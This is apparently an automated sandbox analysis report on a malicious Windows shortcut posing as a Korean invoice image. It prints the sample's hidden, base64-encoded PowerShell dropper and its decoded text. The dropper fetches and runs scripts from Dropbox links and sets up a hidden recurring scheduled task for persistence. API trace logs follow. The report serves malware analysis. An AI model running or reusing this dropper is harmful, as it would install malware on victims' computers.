popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

도양기업 20240610 송장 갑지.bmp.lnk

Antivirus GIF Format Lnk Format wget AntiVM AntiDebug
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 Aug. 26, 2024, 9:20 a.m. Aug. 26, 2024, 9:22 a.m.
Size 310.8KB
Type MS Windows shortcut, Has Description string, Has command line arguments, Icon number=67, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5 09b1213c8a336541a4849d65b937293f
SHA256 44ff60d352169f280801cf2075295aab0a6151ff8f77b66d16c82776efce7fea
CRC32 8A2BD054
ssdeep 1536:Owj7bPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLPLs:Owjg
Yara
  • Antivirus - Contains references to security software
  • lnk_file_format - Microsoft Windows Shortcut File Format
  • Lnk_Format_Zero - LNK Format

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "dSjKITEYXqGx" "C:\Users\test22\AppData\Local\Temp\도양기업 20240610 송장 갑지.bmp.lnk"

    3012

    • powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -nop -NoProfile -NonInteractive -ExecutionPolicy Bypass -c "$ss =\"JGhoaCA9IEpvaW4tUGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgIuuPhOyWkeq4sOyXhSAyMDI0MDYwOCDshqHsnqUg6rCR7KeALmJtcCI7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS9xdW82M3FtOGQzaXFsaG1weWliN3AvMjAyNDA2MDguYm1wP3Jsa2V5PXNicGNndWJnaTBpeGl5bm01bGJzbnE4MXAmc3Q9eWxkYnNyb3UmZGw9MCIgLU91dEZpbGUgJGhoaDsgJiAkaGhoOyAkcHBwID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpICJjaHJvbWUucHMxIjsgJHN0ciA9ICckYWFhID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpICJ0ZW1wLnBzMSI7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS82dzkwdGxybndtajgzNTM3ZTltZDcvMDYxMHNhZmUteC50eHQ/cmxrZXk9ZDZjZWR2dGVvazNreWVwbmZweHRuM2k5aSZzdD15YjRqendzMCZkbD0wIiAtT3V0RmlsZSAkYWFhOyAmICRhYWE7IFJlbW92ZS1JdGVtIC1QYXRoICRhYWEgLUZvcmNlOyc7ICRzdHIgfCBPdXQtRmlsZSAtRmlsZVBhdGggJHBwcCAtRW5jb2RpbmcgVVRGODsgJGFjdGlvbiA9IE5ldy1TY2hlZHVsZWRUYXNrQWN0aW9uIC1FeGVjdXRlICdQb3dlclNoZWxsLmV4ZScgLUFyZ3VtZW50ICctV2luZG93U3R5bGUgSGlkZGVuIC1ub3AgIC1Ob25JbnRlcmFjdGl2ZSAtTm9Qcm9maWxlIC1FeGVjdXRpb25Qb2xpY3kgQnlwYXNzIC1Db21tYW5kICImIHskYWJjID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpIFwiY2hyb21lLnBzMVwiOyAmICRhYmM7fSInOyAkdHJpZ2dlciA9IE5ldy1TY2hlZHVsZWRUYXNrVHJpZ2dlciAtT25jZSAtQXQgKEdldC1EYXRlKS5BZGRNaW51dGVzKDUpIC1SZXBldGl0aW9uSW50ZXJ2YWwgKE5ldy1UaW1lU3BhbiAtTWludXRlcyAzMCk7ICRzZXR0aW5ncyA9IE5ldy1TY2hlZHVsZWRUYXNrU2V0dGluZ3NTZXQgLUhpZGRlbjsgUmVnaXN0ZXItU2NoZWR1bGVkVGFzayAtVGFza05hbWUgIkNocm9tZVVwZGF0ZUNvcmVUYXNrTWFjaGluZUtPUiIgLUFjdGlvbiAkYWN0aW9uIC1UcmlnZ2VyICR0cmlnZ2VyIC1TZXR0aW5ncyAkc2V0dGluZ3M7ICAkYWFhID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpICJzeXN0ZW1fZmlyc3QucHMxIjsgd2dldCAtVXJpICJodHRwczovL2RsLmRyb3Bib3h1c2VyY29udGVudC5jb20vc2NsL2ZpL3M3ZDZhd2lkNTh4cjg5aHRsbnl5Yy8wNjEwc2FmZS1mLnR4dD9ybGtleT1lcXhiY2gyMW5pbGhnd29ydHl3MHhiYmk5JnN0PXd3Y3RzeWIyJmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7\"; $aa = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($ss));$cc = $env:appdata;$dd = \"user.ps1\";$ee = Join-Path $cc $dd;$aa | Out-File -FilePath $ee; $aaaaa= 89897878; & $ee; Remove-Item -Path $ee -Force;"

      2204

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: The term 'wget' is not recognized as the name of a cmdlet, function, script fil
console_handle: 0x00000027
1 1 0

WriteConsoleW

 buffer: e, or operable program. Check the spelling of the name, or if a path was includ
console_handle: 0x00000033
1 1 0

WriteConsoleW

 buffer: ed, verify that the path is correct and try again.
console_handle: 0x0000003f
1 1 0

WriteConsoleW

 buffer: At C:\Users\test22\AppData\Roaming\user.ps1:1 char:83
console_handle: 0x0000004b
1 1 0

WriteConsoleW

 buffer: + $hhh = Join-Path ([System.IO.Path]::GetTempPath()) "도양기업 20240608 송장 갑지.bmp";
console_handle: 0x00000057
1 1 0

WriteConsoleW

 buffer: wget <<<< -Uri "https://dl.dropboxusercontent.com/scl/fi/quo63qm8d3iqlhmpyib7
console_handle: 0x00000063
1 1 0

WriteConsoleW

 buffer: p/20240608.bmp?rlkey=sbpcgubgi0ixiynm5lbsnq81p&st=yldbsrou&dl=0" -OutFile $hhh;
console_handle: 0x0000006f
1 1 0

WriteConsoleW

 buffer: & $hhh; $ppp = Join-Path ($env:AppData) "chrome.ps1"; $str = '$aaa = Join-Path
console_handle: 0x0000007b
1 1 0

WriteConsoleW

 buffer: ($env:AppData) "temp.ps1"; wget -Uri "https://dl.dropboxusercontent.com/scl/fi
console_handle: 0x00000087
1 1 0

WriteConsoleW

 buffer: /6w90tlrnwmj83537e9md7/0610safe-x.txt?rlkey=d6cedvteok3kyepnfpxtn3i9i&st=yb4jzw
console_handle: 0x00000093
1 1 0

WriteConsoleW

 buffer: s0&dl=0" -OutFile $aaa; & $aaa; Remove-Item -Path $aaa -Force;'; $str | Out-Fil
console_handle: 0x0000009f
1 1 0

WriteConsoleW

 buffer: e -FilePath $ppp -Encoding UTF8; $action = New-ScheduledTaskAction -Execute 'Po
console_handle: 0x000000ab
1 1 0

WriteConsoleW

 buffer: werShell.exe' -Argument '-WindowStyle Hidden -nop -NonInteractive -NoProfile -
console_handle: 0x000000b7
1 1 0

WriteConsoleW

 buffer: ExecutionPolicy Bypass -Command "& {$abc = Join-Path ($env:AppData) \"chrome.ps
console_handle: 0x000000c3
1 1 0

WriteConsoleW

 buffer: 1\"; & $abc;}"'; $trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMi
console_handle: 0x000000cf
1 1 0

WriteConsoleW

 buffer: nutes(5) -RepetitionInterval (New-TimeSpan -Minutes 30); $settings = New-Schedu
console_handle: 0x000000db
1 1 0

WriteConsoleW

 buffer: ledTaskSettingsSet -Hidden; Register-ScheduledTask -TaskName "ChromeUpdateCoreT
console_handle: 0x000000e7
1 1 0

WriteConsoleW

 buffer: askMachineKOR" -Action $action -Trigger $trigger -Settings $settings; $aaa = J
console_handle: 0x000000f3
1 1 0

WriteConsoleW

 buffer: oin-Path ($env:AppData) "system_first.ps1"; wget -Uri "https://dl.dropboxuserco
console_handle: 0x000000ff
1 1 0

WriteConsoleW

 buffer: ntent.com/scl/fi/s7d6awid58xr89htlnyyc/0610safe-f.txt?rlkey=eqxbch21nilhgwortyw
console_handle: 0x0000010b
1 1 0

WriteConsoleW

 buffer: 0xbbi9&st=wwctsyb2&dl=0" -OutFile $aaa; & $aaa; Remove-Item -Path $aaa -Force;
console_handle: 0x00000117
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ObjectNotFound: (wget:String) [], CommandNotFoun
console_handle: 0x00000123
1 1 0

WriteConsoleW

 buffer: dException
console_handle: 0x0000012f
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x0000013b
1 1 0

WriteConsoleW

 buffer: The term 'C:\Users\test22\AppData\Local\Temp\도양기업 20240608 송장 갑지.bmp' is not re
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: cognized as the name of a cmdlet, function, script file, or operable program. C
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: heck the spelling of the name, or if a path was included, verify that the path
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: is correct and try again.
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: At C:\Users\test22\AppData\Roaming\user.ps1:1 char:232
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: + $hhh = Join-Path ([System.IO.Path]::GetTempPath()) "도양기업 20240608 송장 갑지.bmp";
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: wget -Uri "https://dl.dropboxusercontent.com/scl/fi/quo63qm8d3iqlhmpyib7p/2024
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: 0608.bmp?rlkey=sbpcgubgi0ixiynm5lbsnq81p&st=yldbsrou&dl=0" -OutFile $hhh; & <<<
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: < $hhh; $ppp = Join-Path ($env:AppData) "chrome.ps1"; $str = '$aaa = Join-Path
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: ($env:AppData) "temp.ps1"; wget -Uri "https://dl.dropboxusercontent.com/scl/fi
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: /6w90tlrnwmj83537e9md7/0610safe-x.txt?rlkey=d6cedvteok3kyepnfpxtn3i9i&st=yb4jzw
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: s0&dl=0" -OutFile $aaa; & $aaa; Remove-Item -Path $aaa -Force;'; $str | Out-Fil
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: e -FilePath $ppp -Encoding UTF8; $action = New-ScheduledTaskAction -Execute 'Po
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: werShell.exe' -Argument '-WindowStyle Hidden -nop -NonInteractive -NoProfile -
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: ExecutionPolicy Bypass -Command "& {$abc = Join-Path ($env:AppData) \"chrome.ps
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: 1\"; & $abc;}"'; $trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMi
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: nutes(5) -RepetitionInterval (New-TimeSpan -Minutes 30); $settings = New-Schedu
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: ledTaskSettingsSet -Hidden; Register-ScheduledTask -TaskName "ChromeUpdateCoreT
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: askMachineKOR" -Action $action -Trigger $trigger -Settings $settings; $aaa = J
console_handle: 0x000000fb
1 1 0

WriteConsoleW

 buffer: oin-Path ($env:AppData) "system_first.ps1"; wget -Uri "https://dl.dropboxuserco
console_handle: 0x00000107
1 1 0

WriteConsoleW

 buffer: ntent.com/scl/fi/s7d6awid58xr89htlnyyc/0610safe-f.txt?rlkey=eqxbch21nilhgwortyw
console_handle: 0x00000113
1 1 0

WriteConsoleW

 buffer: 0xbbi9&st=wwctsyb2&dl=0" -OutFile $aaa; & $aaa; Remove-Item -Path $aaa -Force;
console_handle: 0x0000011f
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : ObjectNotFound: (C:\Users\test22...40608 송장 갑지.b
console_handle: 0x0000012b
1 1 0

WriteConsoleW

 buffer: mp:String) [], CommandNotFoundException
console_handle: 0x00000137
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x00000143
1 1 0

WriteConsoleW

 buffer: The term 'New-ScheduledTaskAction' is not recognized as the name of a cmdlet, f
console_handle: 0x00000167
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00299400
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00299340
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00299340
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00299340
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00299640
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00299640
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00299640
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00299640
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00299640
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00299640
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00298c00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00298c00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00298c00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002998c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002998c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002998c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00299980
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002998c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002998c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002998c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002998c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002998c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002998c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002998c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00299180
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00299180
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00299180
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00299180
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00299180
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00299180
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00299180
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00299180
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00299180
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00299180
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00299180
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00299180
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00299180
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00299180
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00298f40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00298f40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00298f40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00298f40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00298f40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00298f40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00298f40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00298f40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00298f40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00298f40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00298f40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00298f40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 2097152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029c0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2204
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73921000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0272a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2204
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73922000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02722000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02732000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b81000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b82000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0279a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02733000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02734000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0272b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02792000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02735000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0279c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02736000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02793000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02794000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02795000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02796000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02797000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02798000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02799000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x050b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
